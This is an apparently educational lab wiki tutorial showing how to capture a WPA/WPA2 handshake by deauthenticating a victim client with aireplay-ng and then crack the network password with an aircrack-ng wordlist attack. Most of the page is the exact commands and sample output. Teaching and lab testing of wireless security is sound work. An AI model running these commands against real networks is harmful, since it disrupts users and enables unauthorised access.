WPA/WPA2 PSK deauthentication attack

From Embedded Lab Vienna for IoT & Security
Revision as of 18:57, 17 February 2020 by Ikramer (talk | contribs) (How to sniff a WPA/WPA2 handshake using a deauthentication attack and use aircrack-ng to crack the password.)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

Summary

How to sniff a WPA/WPA2 handshake using a deauthentication attack and use aircrack-ng to crack the password.

Requirements and Tools

  • Operating system: Ubuntu 18.04 bionic amd64
  • Aircrack-ng

Description

Put your interface in monitor mode

  • Use airmon-ng to put interface in monitor mode
  airmon-ng
     PHY	Interface	Driver		Chipset
     phy0	wlan0		iwlwifi		Intel Corporation Wireless 7260 (rev 83)
  • First we need to set interface in monitor mode `iw wlan0 del` and execute the command :
  airmon-ng
  Found phy0 with no interfaces assigned, would you like to assign one to it? [y/n] y
     PHY	Interface	Driver		Chipset
     phy0	wlan0mon	iwlwifi		Intel Corporation Wireless 7260 (rev 83)
  • Kill all processes which use physical device
  airmon-ng check kill
  Killing these processes:
     PID Name
     895 wpa_supplican
  • Start in monitor mode
  airmon-ng start wlan0mon 9


Check needed MAC addresses

  • using wireshark or airodump-ng
  airodump-ng wlan0mon
  • You will need:
    • BSSID (MAC address of access point): <bssid>
    • Access point channel: <channel>
    • MAC address of a victim, wireless client using WPA2

Capture handshak

  • Get handshake or connected station
  airodump-ng -c <channel> --bssid <bssid> -w psk wlan0mon

if no there is no handshake captured you need to get the MAC address of a victim and deauthenticate

  • Deauthenticate using airreplay-ng
  aireplay-ng -0 1 -a <bssid> -c <victim mac address> wlan0mon

-0 means deauthentication 1 number of deauthentication frames sent -a bssid mac address -c victim mac address to deauthenticate

  • examine handshake with wireshark filter eapol messages

Crack with aircrack-ng

  aircrack-ng -w <passwordlist path> -b  <bssd> psk*.cap

Reset

do not forget to turn off monitor mode and restart network manager

  • Stop monitor mode
  airmon-ng stop wlan0mon
  • Restart network manager for internet access
  service network-manager restart


Used Hardware

Notebook with Wifi interface card

Courses

References

Retrieved from "https://wiki.elvis.science/index.php?title=WPA/WPA2_PSK_deauthentication_attack&oldid=3173"